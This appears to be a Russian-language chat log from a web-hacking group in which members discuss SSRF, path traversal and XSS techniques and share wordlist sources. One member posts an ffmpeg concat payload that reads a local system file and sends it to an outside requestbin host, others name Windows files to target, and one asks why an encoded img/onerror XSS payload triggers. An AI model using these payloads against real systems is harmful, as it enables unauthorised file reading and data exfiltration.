Size: a a a

2020 May 19

AS

Andrew Sparks in WebPwnChat
не, у меня тут напрямую, ssrf
источник

M

MortusKill in WebPwnChat
Раз уж тут про Swissky заговорили, то у него есть в разделе PathTraversal - список дефолтныз виндовых файлов
источник

BF

Billy Fox in WebPwnChat
Но ты учти что если ты не в ц томе то тогда особо это не поможет против ssrf
источник

AS

Andrew Sparks in WebPwnChat
MortusKill
Раз уж тут про Swissky заговорили, то у него есть в разделе PathTraversal - список дефолтныз виндовых файлов
а, блин, капец, я не в том разделе смотрел, спасибо) помню же что видел
источник

M

MortusKill in WebPwnChat
Andrew Sparks
а, блин, капец, я не в том разделе смотрел, спасибо) помню же что видел
Но вообще классикой конечно считается:
C:\Windows\win.ini
Странно, что в списке сверху его нет
источник

IS

I S in WebPwnChat
И system32 в корне как бы не то
источник

P

PP in WebPwnChat
MAGIC нету, расходимся...........
источник

P

Pulsar in WebPwnChat
там сверху линк откуда взяты пути - слепое чтение.
может эт не совсем то, что нужно
источник

P

Pulsar in WebPwnChat
только сейчас представил как это звучит - слепое чтение
источник

IS

I S in WebPwnChat
Pulsar
только сейчас представил как это звучит - слепое чтение
Брайль перевернулся в гробу
источник

AS

Andrew Sparks in WebPwnChat
эх, чет не работает, пытаюсь ffmpeg проэксплутировать,
concat:http://requestbin.net/r/*******?f=|file:///boot.ini

не работает, приходит пустой f=
источник

AS

Andrew Sparks in WebPwnChat
кучу нагрузок сувал уже, что еще можно попробовать?
источник

IS

I S in WebPwnChat
В корне install.log посмотри ( часто в корне других дисков наблюдал) если ты не на том диске или вебдиры. А он пути из переменных не воспринимает ? %temp% ?
источник

IS

I S in WebPwnChat
I S
В корне install.log посмотри ( часто в корне других дисков наблюдал) если ты не на том диске или вебдиры. А он пути из переменных не воспринимает ? %temp% ?
env которые
источник

S

S N in WebPwnChat
https://github.com/adamtlangley/gitscraper/ кто еще знает кроме этого и seclists и fuzzdb чтобы листы были?
источник

ЭК

Элайджи Камски... in WebPwnChat
PP
В бурп дбавили КиберШеф плагин официально
Это что?
источник

P

PP in WebPwnChat
источник

P

PP in WebPwnChat
Это удобненько
источник

D

Denis in WebPwnChat
Но какой смысл без magic было делать не понятно( зачем нужен ещё один декодер
источник

m

medalahonor in WebPwnChat
Почему пейлоады вроде <img src=1 onerror=&#097lert() /> вообще триггерят xss? Это часть стандарта HTML или приблуды браузеров? Потому что такие вещи не работают внутри тега script, так как,  согласно html, всё, что внутри этого тега, считается обычным текстом и просто передается как есть в парсер javascript.
источник